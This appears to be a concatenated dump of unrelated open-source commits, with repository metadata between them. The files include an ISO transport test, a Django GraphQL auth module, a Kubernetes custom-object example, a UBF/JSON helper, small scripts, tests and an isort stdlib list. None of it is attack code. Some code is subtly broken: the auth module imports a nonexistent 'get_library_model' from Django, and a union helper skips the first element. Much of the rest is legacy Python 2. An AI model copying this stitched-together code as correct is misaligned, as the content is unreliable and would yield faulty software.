Test case for functions in OvfTransport.py
"""
import unittest, os
import hashlib
from subprocess import call
from subprocess import Popen
from subprocess import PIPE
from subprocess import STDOUT
from ovf import OvfTransport
TEST_FILES_DIR = os.path.join(os.path.dirname(__file__), "test_files/")
def compareFileMD5s(isoFileName, sourceFile, isoEnvFile=None):
"""
Dump isoEnvFile on isoFileName. Compare it's md5 sum to the sum
for sourceFile.
"""
isoinfoCmd = ["isoinfo", "-JR", "-i", isoFileName, "-x", ""]
# the way this is done assumes a reasonable sized env file. if
# the size of these files get bigger, this algorithm would need
# to be changed
sourcemd5 = hashlib.md5()
sfd = open(sourceFile)
fileContents = sfd.read()
sourcemd5.update(fileContents)
sfd.close()
# run command to dump file out of iso
if not isoEnvFile:
isoEnvFile = os.path.basename(sourceFile)
isoinfoCmd[5] = '/' + isoEnvFile
pcmd = Popen(isoinfoCmd, stdout=PIPE, stderr=STDOUT)
isodump = pcmd.communicate()[0]
targetmd5 = hashlib.md5()
targetmd5.update(isodump)
return sourcemd5.digest() == targetmd5.digest()
class OvfTransportTestCase(unittest.TestCase):
"""
Test OvfTransport functions
"""
path = TEST_FILES_DIR
outIsoFile = path + 'ourOVF.iso'
inEnvFile = path + 'test-environment.xml'
def test_selectISOProgram(self):
"""
Test OvfTransport.selectISOProgram
"""
isoProgs = ['genisoimage', 'mkisofs']
# inspect the system to see what's installed and where
for prog in isoProgs:
retcode = call(["which", prog], stdout=PIPE, stderr=STDOUT)
if not retcode:
isoProg = OvfTransport.selectISOProgram()
assert isoProg == prog, "failed test for: " + prog
return
self.fail("no ISO format programs available on system")
def test_makeISOTransport(self):
"""
Test OvfTransport.makeISOTransport
"""
makeFileList = [(self.outIsoFile, [self.inEnvFile])]
OvfTransport.makeISOTransport(makeFileList)
# validate the generated image
self.assertTrue(os.path.exists(self.outIsoFile),
'ISO file was not created')
retcode = call(["which", "isoinfo"], stdout=PIPE, stderr=STDOUT)
if not retcode:
# for each file, dump the file and calc the md5 sum. compare
# that to the one for the original file.
# the way this is done assumes a reasonable sized env file. if
# the size of these files get bigger, this algorithm would need
# to be changed
# check the env file first
for (outfilename, infilelist) in makeFileList:
self.assertTrue(compareFileMD5s(outfilename, infilelist[0],
'ovf-env.xml'),
'MD5 miscompare')
restOfFiles = infilelist[1:]
for curFile in restOfFiles:
# assert the two are equal
self.assertTrue(compareFileMD5s(outfilename, curFile),
'MD5 mismatch')
if __name__ == "__main__":
TEST = unittest.TestLoader().loadTestsFromTestCase(OvfTransportTestCase)
RUNNER = unittest.TextTestRunner(verbosity=2)
RUNNER.run(unittest.TestSuite(TEST))
| epl-1.0 | Python | |
307816d3b6cb5e57f50f80e10eccd0a701c698a9 | Fix syntax errors. | sonium0/pymatgen,migueldiascosta/pymatgen,migueldiascosta/pymatgen,Bismarrck/pymatgen,yanikou19/pymatgen,ctoher/pymatgen,Bismarrck/pymatgen,ctoher/pymatgen,sonium0/pymatgen,Bismarrck/pymatgen,Bismarrck/pymatgen,Dioptas/pymatgen,migueldiascosta/pymatgen,Bismarrck/pymatgen,rousseab/pymatgen,rousseab/pymatgen,sonium0/pymatgen,rousseab/pymatgen,yanikou19/pymatgen,Dioptas/pymatgen,yanikou19/pymatgen,ctoher/pymatgen | pymatgen/io/abinitio/__init__.py | pymatgen/io/abinitio/__init__.py | from .eos import *
from .pseudos import *
from .netcdf import *
from .events import *
from .tasks import *
from .workflows import *
from .calculations import *
| from .calculations import *
from .eos import *
from .pseudos import *
from .netcdf import *
from .events import *
from .task import *
from .workflow import *
| mit | Python |
d4e6f44c5257afd02883bd739cf6b3953e398857 | Create auth.py | damianmoore/photo-manager,damianmoore/photo-manager,damianmoore/photo-manager,damianmoore/photo-manager | photonix/photos/auth.py | photonix/photos/auth.py | import os
from django.contrib.auth import get_library_model
import graphene
from graphene_django.types import DjangoObjectType
import graphql_jwt
Library = get_library_model()
class Mutation(graphene.ObjectType):
token_auth = graphql_jwt.ObtainJSONWebToken.Field()
verify_token = graphql_jwt.Verify.Field()
refresh_token = graphql_jwt.Refresh.Field()
revoke_token = graphql_jwt.Revoke.Field()
class UserType(DjangoObjectType):
class Meta:
model = Library
class Environment(graphene.ObjectType):
demo = graphene.Boolean()
first_run = graphene.Boolean()
class Query(graphene.ObjectType):
profile = graphene.Field(UserType)
environment = graphene.Field(Environment)
def resolve_profile(self, info):
user = info.context.user
if user.is_anonymous:
raise Exception('Not logged in')
return user
def resolve_environment(self, info):
return {
'demo': os.environ.get('DEMO', False),
'first_run': False,
}
| agpl-3.0 | Python | |
fca1765fa57dfe047b74594883048ee2a8f473dc | Create cluster_scoped_custom_object.py | kubernetes-client/python,kubernetes-client/python | examples/cluster_scoped_custom_object.py | examples/cluster_scoped_custom_object.py | # Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Uses a Custom Resource Definition (CRD) to create a custom object, in this case
a CronTab. This example use an example CRD from this tutorial:
https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/
Apply the following yaml manifest to create a cluster-scoped CustomResourceDefinition (CRD)
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: crontabs.stable.example.com
spec:
group: stable.example.com
versions:
- name: v1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
properties:
spec:
type: object
properties:
cronSpec:
type: string
image:
type: string
replicas:
type: integer
scope: Cluster
names:
plural: crontabs
singular: crontab
kind: CronTab
shortNames:
- ct
"""
from pprint import pprint
from kubernetes import client, config
def main():
config.load_kube_config()
api = client.CustomObjectsApi()
# definition of custom resource
test_resource = {
"apiVersion": "stable.example.com/v1",
"kind": "CronTab",
"metadata": {"name": "test-crontab"},
"spec": {"cronSpec": "* * * * */5", "image": "my-awesome-cron-image"},
}
# patch to update the `spec.cronSpec` field
cronspec_patch = {
"spec": {"cronSpec": "* * * * */15", "image": "my-awesome-cron-image"}
}
# patch to add the `metadata.labels` field
metadata_label_patch = {
"metadata": {
"labels": {
"foo": "bar",
}
}
}
# create a cluster scoped resource
created_resource = api.create_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
body=test_resource,
)
# get the cluster scoped resource
resource = api.get_cluster_custom_object(
group="stable.example.com",
version="v1",
name="test-crontab",
plural="crontabs",
)
print("%s\t\t%s" % ("NAME", "SCHEDULE"))
print(
"%s\t%s\n" %
(resource["metadata"]["name"],
resource["spec"]["cronSpec"]))
# patch the `spec.cronSpec` field of the custom resource
patched_resource = api.patch_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
name="test-crontab",
body=cronspec_patch,
)
print("%s\t\t%s" % ("NAME", "PATCHED_SCHEDULE"))
print(
"%s\t%s\n" %
(patched_resource["metadata"]["name"],
patched_resource["spec"]["cronSpec"]))
# patch the `metadata.labels` field of the custom resource
patched_resource = api.patch_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
name="test-crontab",
body=metadata_label_patch,
)
print("%s\t\t%s" % ("NAME", "PATCHED_LABELS"))
print(
"%s\t%s\n" %
(patched_resource["metadata"]["name"],
patched_resource["metadata"]["labels"]))
# delete the custom resource "test-crontab"
api.delete_cluster_custom_object(
group="stable.example.com",
version="v1",
name="test-crontab",
plural="crontabs",
body=client.V1DeleteOptions(),
)
print("Resource `test-crontab` deleted!")
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
bda8b764dca26d9dae2d81da630b5e1328a9aa51 | implement simple python helper for ubf and jsf | hibari/ubf,ubf/ubf,cloudian/ubf,ubf/ubf,ubf/ubf,cloudian/ubf,hibari/ubf,cloudian/ubf,hibari/ubf,hibari/ubf | priv/python/pyubf.py | priv/python/pyubf.py |
##
## $Id: pyubf.py 132283 2009-04-15 14:54:16Z norton $
##
##
## UBF primitives:
##
## integer, float, atom, string, binary, tuple, record, list, term, void
##
def Integer(value):
assert isinstance(value, int) or isinstance(value, long)
return value
def Float(value):
assert isinstance(value, float)
return value
class Atom(str):
def __init__(self, value):
assert isinstance(value, str)
str.__init__(self, value)
def __repr__(self):
return "<ubf-atom: %s>" % `str.__repr__(self)`
class String(str):
def __init__(self, value):
assert isinstance(value, str)
str.__init__(self, value)
def __repr__(self):
return "<ubf-string: %s>" % `str.__repr__(self)`
def Binary(value):
assert isinstance(value, str) or isinstance(value, unicode)
return value
def Tuple(value):
assert isinstance(value, tuple)
return value
class Record(dict):
def __init__(self, name, fields):
assert isinstance(name, str) and isinstance(fields, dict)
dict.__init__(self, fields)
self.name = name
def __repr__(self):
return "<ubf-record: %s %s>" % (self.name, `dict.__repr__(self)`)
def List(value):
assert isinstance(value, list)
return value
##
## pyjson -> pyubf
##
def from_pyjson(value):
if value is None:
return value
elif isinstance(value, bool):
return value
elif isinstance(value, int) or isinstance(value, long):
return Integer(value)
elif isinstance(value, float):
return Float(value)
elif isinstance(value, str) or isinstance(value, unicode):
return Binary(value)
elif isinstance(value, dict):
if value.keys() == ['$A']:
return Atom(value['$A'])
elif value.keys() == ['$S']:
return String(value['$S'])
elif value.keys() == ['$T']:
return Tuple(tuple(from_pyjson(value['$T'])))
elif value.has_key('$R') and len(value.keys()) > 1:
name = value['$R']
del value['$R']
fields = dict([ [k, from_pyjson(v)] for k, v in value.iteritems() ])
return Record(name, fields)
else:
raise RuntimeError, 'unknown dict ~s' % repr(value)
elif isinstance(value, list):
return [ from_pyjson(v) for v in value ]
else:
raise RuntimeError, 'unknown object ~s' % repr(value)
##
## pyubf -> pyjson
##
def to_pyjson(value):
if value is None:
return value
elif isinstance(value, bool):
return value
elif isinstance(value, int) or isinstance(value, long):
return value
elif isinstance(value, float):
return value
elif isinstance(value, Atom):
return {'$A' : str(value)}
elif isinstance(value, String):
return {'$S' : str(value)}
elif isinstance(value, str):
return value
elif isinstance(value, unicode):
return value
elif isinstance(value, tuple):
return {'$T' : [ to_pyjson(v) for v in list(value) ]}
elif isinstance(value, Record):
record = dict([ [k, to_pyjson(v)] for k, v in value.iteritems() ])
record.update({'$R' : value.name})
return record
elif isinstance(value, list):
return [ to_pyjson(v) for v in value ]
else:
raise RuntimeError, 'unknown object ~s' % repr(value)
| mit | Python | |
ed05755f1f5213cdd95203f51d0097bfbd91e6e1 | Create FindtheDifference_BitandHash.py | Chasego/codi,cc13ny/algo,Chasego/cod,Chasego/codirit,cc13ny/algo,Chasego/cod,cc13ny/Allin,Chasego/cod,Chasego/codirit,Chasego/cod,Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/Allin,cc13ny/Allin,cc13ny/Allin,cc13ny/Allin,Chasego/codi,Chasego/codirit,Chasego/codi,Chasego/codirit,cc13ny/algo,Chasego/codirit,cc13ny/algo,Chasego/codi | leetcode/389-Find-the-Difference/FindtheDifference_BitandHash.py | leetcode/389-Find-the-Difference/FindtheDifference_BitandHash.py | class Solution(object):
def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
chrs = {}
res = 0
for w in t:
if w not in chrs:
chrs[w] = 1 << (ord(w) - 97)
res += chrs[w]
for w in s:
res -= chrs[w]
return chr(len(bin(res)) + 94)
| mit | Python | |
fddcad6de86d8d1dbd37c549b0d4258260c13a3a | Read in sample text file 'proteinGroups.txt' | dmyersturnbull/pynd-pubs-ms | proteinGroups.py | proteinGroups.py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 8 20:48:41 2015
@author: student
"""
import pandas as pd
#import numpy as np
# read in file
df = pd.read_table('/Users/student/Desktop/pubs/Sample text files/proteinGroups.txt', index_col=0)
#print df.dtypes
print df['Intensity'] | apache-2.0 | Python | |
558d45ed0b9c3d375daa81383125e0c4664df7af | Add adwaita-icon-theme | BansheeMediaPlayer/bockbuild,BansheeMediaPlayer/bockbuild,BansheeMediaPlayer/bockbuild | packages/adwaita-icon-theme.py | packages/adwaita-icon-theme.py | GnomeXzPackage ('adwaita-icon-theme', version_major = '3.16', version_minor = '2.1')
| mit | Python | |
7a068ebb9a50e7c1c77cada56b96586cb322066c | Add collect tests. | sievetech/rgc | test/test_collect.py | test/test_collect.py | # -*- coding: utf-8 -*-
import os
import mock
import unittest
from rgc.rules import Rule, namehasprefix, namehassuffix
from rgc import collect
class TestCollect(unittest.TestCase):
def setUp(self):
os.environ['user'] = 'john'
os.environ['key'] = '12345abcd'
def test_dryrun_no_rule_true_collects_everything(self):
mock_obj = mock.MagicMock()
mock_obj.name = 'blargh'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule())
self.assertIn(mock.call.delete_object(mock_obj.name), mock_cont.method_calls)
self.assertItemsEqual(['blargh'], deleted)
def test_dryrun_yes_rule_true_does_not_collect(self):
mock_obj = mock.MagicMock()
mock_obj.name = 'blargh'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule(), dryrun=True)
self.assertNotIn(mock.call.delete_object(mock_obj.name), mock_cont.method_calls)
self.assertItemsEqual([mock_obj.name], deleted)
def test_collect_applies_rule(self):
mock_obj1 = mock.MagicMock()
mock_obj1.name = 'pref_name_suf'
mock_obj2 = mock.MagicMock()
mock_obj2.name = 'noprefnosuf'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj1, mock_obj2]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=namehasprefix('pref')&namehassuffix('suf'))
self.assertIn(mock.call.delete_object(mock_obj1.name), mock_cont.method_calls)
self.assertNotIn(mock.call.delete_object(mock_obj2.name), mock_cont.method_calls)
self.assertItemsEqual([mock_obj1.name], deleted)
def test_specific_container(self):
mock_obj1 = mock.MagicMock()
mock_obj1.name = 'mock1'
mock_cont1 = mock.MagicMock()
mock_cont1.name = 'container1'
mock_cont1.get_objects.return_value = [mock_obj1]
mock_obj2 = mock.MagicMock()
mock_obj2.name = 'mock2'
mock_cont2 = mock.MagicMock()
mock_cont2.name = 'container2'
mock_cont2.get_objects.return_value = [mock_obj2]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont1, mock_cont2]
mock_conn.get_container.return_value = mock_cont1
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule(), container='container1')
self.assertIn(mock.call.delete_object(mock_obj1.name), mock_cont1.method_calls)
self.assertNotIn(mock.call.delete_object(mock_obj2.name), mock_cont2.method_calls)
self.assertItemsEqual([mock_obj1.name], deleted)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python | |
af2a0a851be91931f96a7e9d44a1e8c460d70918 | Migrate creation date to new casebooks | harvard-lil/h2o,harvard-lil/h2o,harvard-lil/h2o,harvard-lil/h2o | web/main/migrations/0052_migrate_casebook_dates.py | web/main/migrations/0052_migrate_casebook_dates.py | # Generated by Django 2.2.10 on 2020-04-14 11:38
from django.db import migrations
from main.models import Casebook
def copy_old_dates(app, schema):
update_cbs = []
for casebook in Casebook.objects.select_related('old_casebook').all():
if casebook.old_casebook:
casebook.created_at = casebook.old_casebook.created_at
update_cbs.append(casebook)
Casebook.objects.bulk_update(update_cbs, ['created_at'])
class Migration(migrations.Migration):
dependencies = [
('main', '0051_auto_20200407_1714'),
]
operations = [
migrations.RunPython(copy_old_dates, migrations.RunPython.noop)
]
| agpl-3.0 | Python | |
7e53ec5de1d094eafa6a0bba6efcdaf845d5a7b8 | Create 0007.py | Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Show-Me-the-Code/python,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2 | pylyria/0007/0007.py | pylyria/0007/0007.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright By PyLyria
# CreateTime: 2016-03-04 19:36:40
import os
def get_path(root = os.curdir):
root += os.sep
for path, dirs, files in os.walk(root):
for file_name in files:
yield path, file_name
def get_lines(file_name):
with open(file_name,'rt',encoding='utf-8') as f:
for line in f:
yield line.strip()
if __name__ == '__main__':
paths = get_path()
format = ('.py', '.c', '.cpp', '.sql')
annotation = ('#', '//', '--', '/*')
code_statistics = {}
for path, file_name in paths:
if file_name.endswith(format):
code_statistics[file_name] = {}
lines = get_lines(path + os.sep + file_name)
for line in lines:
if len(line) ==0:
code_statistics[file_name]['EmptyLine'] = code_statistics[file_name].get('EmptyLine', 0) + 1
elif line.startswith(annotation):
code_statistics[file_name]['AnnotationLine'] = code_statistics[file_name].get('AnnotationLine', 0) + 1
else:
code_statistics[file_name]['CodeLine'] = code_statistics[file_name].get('CodeLine', 0) + 1
print(code_statistics)
| mit | Python | |
0b4c873ad2d0923e88fbee5b52435ff1ee68d03c | Create PedidoVer.py | AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb | backend/Models/Grau/PedidoVer.py | backend/Models/Grau/PedidoVer.py | from Framework.Pedido import Pedido
from Framework.ErroNoHTTP import ErroNoHTTP
class PedidoVer(Pedido):
def __init__(self,variaveis_do_ambiente):
super(PedidoVer, self).__init__(variaveis_do_ambiente)
try:
self.id = self.corpo['id']
except:
raise ErroNoHTTP(400)
def getId(self):
return self.id
| mit | Python | |
d72f6c0d989c3f40d460b1ce5d45b7ebf27ec295 | create tests for kornia | Kaggle/docker-python,Kaggle/docker-python | tests/test_kornia.py | tests/test_kornia.py | import unittest
import cv2
import torch
import kornia
class TestOpenCV(unittest.TestCase):
def test_imread_opencv(self):
img = cv2.imread('/input/tests/data/dot.png')
img_t = kornia.image_to_tensor(img)
self.assertEqual(img.shape, (1, 1, 3))
self.assertEqual(img_t.shape, (3, 1, 1))
def test_grayscale_torch(self):
img_rgb = torch.rand(2, 3, 4, 5)
img_gray = kornia.rgb_to_grayscale(img_rgb)
self.assertEqual(img_gray.shape, (2, 1, 4, 5))
| apache-2.0 | Python | |
e3d0681cf2e449b06abebabb7e8726079997eb01 | Add reflex game | OiNutter/microbit-scripts | reflex/reflex.py | reflex/reflex.py | from microbit import *
import random
score = 0
pixel = None
fade_step = 300
clicked = False
MAX_PAUSE = 3000
def get_rand_coord(limit=4):
return random.randint(0, limit)
def get_rand_side():
return random.choice([-1, 1])
def handle_correct_click(i):
global score, clicked
clicked = True
score += (i+1)*10
display.set_pixel(pixel[0], pixel[1], 0)
sleep(1000)
display.scroll("REFLEX")
display.scroll('Press any button to play', wait=False, loop=True)
while True:
if button_a.is_pressed() or button_b.is_pressed():
print("start playing")
break
display.clear()
while True:
for y in range(0, 5):
display.set_pixel(2, y, 5)
for r in range(1, 16):
print("ROUND %d" % r)
wait_time = random.random()*MAX_PAUSE
print ("WAIT %d", wait_time)
start_time = running_time()
diff = 0
while diff <= wait_time:
new_time = running_time()
diff = new_time - start_time
y = get_rand_coord()
x = (get_rand_side() * (get_rand_coord(1)+1)) + 2
pixel = (x, y)
print(pixel)
clicked = False
for i in range(9, -1, -1):
display.set_pixel(pixel[0], pixel[1], i)
start_time = running_time()
diff = 0
while diff <= fade_step and not clicked:
if x < 2:
if button_a.is_pressed():
handle_correct_click(i)
break
elif button_b.is_pressed():
score -= 10
elif x > 2:
if button_b.is_pressed():
handle_correct_click(i)
break
elif button_a.is_pressed():
score -= 10
new_time = running_time()
diff = new_time - start_time
pixel = None
if r % 5 == 0:
fade_step -= 25
print ("%d: %d" % (r, fade_step))
display.scroll("Score: %d" % score, wait=False, loop=True)
while True:
if button_a.is_pressed() or button_b.is_pressed():
display.clear()
break
| mit | Python | |
998e7ac87ef6e96bb5d421860683f87e8b373428 | Create view.py | rajrohith/blobstore,rajrohith/blobstore | blobstore-python/src/app/view.py | blobstore-python/src/app/view.py | apache-2.0 | Python | ||
a174eb57037254f6277a9418db407995ea9aff9c | Add python 3.9 imports | PyCQA/isort,PyCQA/isort | isort/stdlibs/py39.py | isort/stdlibs/py39.py | """
File contains the standard library of Python 3.9.
DO NOT EDIT. If the standard library changes, a new list should be created
using the mkstdlibs.py script.
"""
stdlib = {
"_thread",
"abc",
"aifc",
"argparse",
"array",
"ast",
"asynchat",
"asyncio",
"asyncore",
"atexit",
"audioop",
"base64",
"bdb",
"binascii",
"binhex",
"bisect",
"builtins",
"bz2",
"cProfile",
"calendar",
"cgi",
"cgitb",
"chunk",
"cmath",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"compileall",
"concurrent",
"configparser",
"contextlib",
"contextvars",
"copy",
"copyreg",
"crypt",
"csv",
"ctypes",
"curses",
"dataclasses",
"datetime",
"dbm",
"decimal",
"difflib",
"dis",
"distutils",
"doctest",
"email",
"encodings",
"ensurepip",
"enum",
"errno",
"faulthandler",
"fcntl",
"filecmp",
"fileinput",
"fnmatch",
"formatter",
"fractions",
"ftplib",
"functools",
"gc",
"getopt",
"getpass",
"gettext",
"glob",
"graphlib",
"grp",
"gzip",
"hashlib",
"heapq",
"hmac",
"html",
"http",
"imaplib",
"imghdr",
"imp",
"importlib",
"inspect",
"io",
"ipaddress",
"itertools",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
"lzma",
"mailbox",
"mailcap",
"marshal",
"math",
"mimetypes",
"mmap",
"modulefinder",
"msilib",
"msvcrt",
"multiprocessing",
"netrc",
"nis",
"nntplib",
"numbers",
"operator",
"optparse",
"os",
"ossaudiodev",
"parser",
"pathlib",
"pdb",
"pickle",
"pickletools",
"pipes",
"pkgutil",
"platform",
"plistlib",
"poplib",
"posix",
"pprint",
"profile",
"pstats",
"pty",
"pwd",
"py_compile",
"pyclbr",
"pydoc",
"queue",
"quopri",
"random",
"re",
"readline",
"reprlib",
"resource",
"rlcompleter",
"runpy",
"sched",
"secrets",
"select",
"selectors",
"shelve",
"shlex",
"shutil",
"signal",
"site",
"smtpd",
"smtplib",
"sndhdr",
"socket",
"socketserver",
"spwd",
"sqlite3",
"ssl",
"stat",
"statistics",
"string",
"stringprep",
"struct",
"subprocess",
"sunau",
"symbol",
"symtable",
"sys",
"sysconfig",
"syslog",
"tabnanny",
"tarfile",
"telnetlib",
"tempfile",
"termios",
"test",
"textwrap",
"threading",
"time",
"timeit",
"tkinter",
"token",
"tokenize",
"trace",
"traceback",
"tracemalloc",
"tty",
"turtle",
"turtledemo",
"types",
"typing",
"unicodedata",
"unittest",
"urllib",
"uu",
"uuid",
"venv",
"warnings",
"wave",
"weakref",
"webbrowser",
"winreg",
"winsound",
"wsgiref",
"xdrlib",
"xml",
"xmlrpc",
"zipapp",
"zipfile",
"zipimport",
"zlib",
"zoneinfo",
}
| mit | Python | |
9c22d354da4c09d2e98b657d334e7594df1042d7 | Create q2.py | pollseed/python_script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/script_lib,pollseed/script_lib | work/q2.py | work/q2.py | def union(arr1, arr2):
result = []
for i in range(1, len(arr1)):
result.append(arr1[i])
result.append(arr2[i])
return result
def create_array():
return [x for x in range(0,100)]
print(union(create_array(), create_array()))
| mit | Python | |
4e1f87bf7805d20e52015b8c283181e4035de54b | Create _init_.py | FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code,FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code,FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code | luowang/tools/tree-tagger-windows-3.2/TreeTagger/cmd/_init_.py | luowang/tools/tree-tagger-windows-3.2/TreeTagger/cmd/_init_.py | apache-2.0 | Python | ||
40ef5b1a6347d54eeb043c64f36286768b41dc3e | Add lldbToolBox.py scaffolding in ./utils for adding lldb python helpers to use when debugging swift. | shahmishal/swift,gribozavr/swift,JGiola/swift,allevato/swift,karwa/swift,huonw/swift,JGiola/swift,nathawes/swift,glessard/swift,shajrawi/swift,shahmishal/swift,harlanhaskins/swift,roambotics/swift,jmgc/swift,harlanhaskins/swift,allevato/swift,ahoppen/swift,tkremenek/swift,gregomni/swift,karwa/swift,ahoppen/swift,rudkx/swift,stephentyrone/swift,JGiola/swift,karwa/swift,tkremenek/swift,jopamer/swift,glessard/swift,xedin/swift,practicalswift/swift,tjw/swift,atrick/swift,alblue/swift,hooman/swift,amraboelela/swift,airspeedswift/swift,danielmartin/swift,shajrawi/swift,gribozavr/swift,airspeedswift/swift,danielmartin/swift,amraboelela/swift,lorentey/swift,roambotics/swift,glessard/swift,alblue/swift,allevato/swift,aschwaighofer/swift,zisko/swift,CodaFi/swift,huonw/swift,xedin/swift,alblue/swift,stephentyrone/swift,allevato/swift,CodaFi/swift,xedin/swift,allevato/swift,nathawes/swift,austinzheng/swift,rudkx/swift,apple/swift,stephentyrone/swift,devincoughlin/swift,hooman/swift,brentdax/swift,parkera/swift,huonw/swift,shajrawi/swift,huonw/swift,roambotics/swift,atrick/swift,glessard/swift,benlangmuir/swift,devincoughlin/swift,devincoughlin/swift,harlanhaskins/swift,natecook1000/swift,hooman/swift,danielmartin/swift,gregomni/swift,jmgc/swift,amraboelela/swift,rudkx/swift,tjw/swift,hooman/swift,glessard/swift,danielmartin/swift,brentdax/swift,sschiau/swift,practicalswift/swift,jopamer/swift,hooman/swift,xwu/swift,brentdax/swift,jckarter/swift,austinzheng/swift,brentdax/swift,rudkx/swift,CodaFi/swift,roambotics/swift,airspeedswift/swift,aschwaighofer/swift,sschiau/swift,stephentyrone/swift,xedin/swift,devincoughlin/swift,xedin/swift,lorentey/swift,atrick/swift,natecook1000/swift,benlangmuir/swift,sschiau/swift,apple/swift,natecook1000/swift,stephentyrone/swift,natecook1000/swift,zisko/swift,gribozavr/swift,gregomni/swift,natecook1000/swift,danielmartin/swift,parkera/swift,shahmishal/swift,JGiola/swift,lorentey/swift,jopamer/swift,amraboelela/swift,stephentyrone/swift,apple/swift,parkera/swift,tkremenek/swift,airspeedswift/swift,benlangmuir/swift,austinzheng/swift,airspeedswift/swift,practicalswift/swift,devincoughlin/swift,tjw/swift,CodaFi/swift,allevato/swift,sschiau/swift,practicalswift/swift,tkremenek/swift,karwa/swift,jopamer/swift,sschiau/swift,zisko/swift,tjw/swift,lorentey/swift,brentdax/swift,alblue/swift,practicalswift/swift,CodaFi/swift,zisko/swift,shajrawi/swift,lorentey/swift,austinzheng/swift,jmgc/swift,parkera/swift,atrick/swift,zisko/swift,xwu/swift,shajrawi/swift,gribozavr/swift,gribozavr/swift,devincoughlin/swift,roambotics/swift,airspeedswift/swift,tjw/swift,apple/swift,jmgc/swift,gregomni/swift,natecook1000/swift,huonw/swift,rudkx/swift,jckarter/swift,lorentey/swift,zisko/swift,JGiola/swift,lorentey/swift,benlangmuir/swift,gregomni/swift,natecook1000/swift,parkera/swift,roambotics/swift,jmgc/swift,xedin/swift,lorentey/swift,ahoppen/swift,alblue/swift,brentdax/swift,jckarter/swift,aschwaighofer/swift,karwa/swift,amraboelela/swift,amraboelela/swift,gregomni/swift,amraboelela/swift,xwu/swift,rudkx/swift,karwa/swift,glessard/swift,apple/swift,xwu/swift,sschiau/swift,JGiola/swift,nathawes/swift,aschwaighofer/swift,atrick/swift,parkera/swift,shajrawi/swift,tjw/swift,hooman/swift,tkremenek/swift,xwu/swift,harlanhaskins/swift,parkera/swift,tkremenek/swift,aschwaighofer/swift,shahmishal/swift,shahmishal/swift,allevato/swift,danielmartin/swift,ahoppen/swift,austinzheng/swift,benlangmuir/swift,aschwaighofer/swift,xwu/swift,airspeedswift/swift,huonw/swift,xedin/swift,sschiau/swift,nathawes/swift,shahmishal/swift,jckarter/swift,xedin/swift,hooman/swift,austinzheng/swift,jckarter/swift,devincoughlin/swift,tkremenek/swift,gribozavr/swift,nathawes/swift,apple/swift,danielmartin/swift,brentdax/swift,sschiau/swift,gribozavr/swift,shahmishal/swift,stephentyrone/swift,jopamer/swift,zisko/swift,shajrawi/swift,jmgc/swift,atrick/swift,harlanhaskins/swift,nathawes/swift,alblue/swift,xwu/swift,CodaFi/swift,gribozavr/swift,tjw/swift,shahmishal/swift,devincoughlin/swift,alblue/swift,jmgc/swift,practicalswift/swift,jckarter/swift,aschwaighofer/swift,jopamer/swift,CodaFi/swift,shajrawi/swift,harlanhaskins/swift,huonw/swift,harlanhaskins/swift,benlangmuir/swift,practicalswift/swift,parkera/swift,austinzheng/swift,ahoppen/swift,jckarter/swift,karwa/swift,practicalswift/swift,karwa/swift,ahoppen/swift,nathawes/swift,jopamer/swift | utils/lldbToolBox.py | utils/lldbToolBox.py | """
LLDB Helpers for working with the swift compiler.
Load into LLDB with 'command script import /path/to/lldbToolBox.py'
This will also import LLVM data formatters as well, assuming that llvm is next
to the swift checkout.
"""
import os
REPO_BASE = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
os.pardir))
SWIFT_REPO = os.path.join(REPO_BASE, "swift")
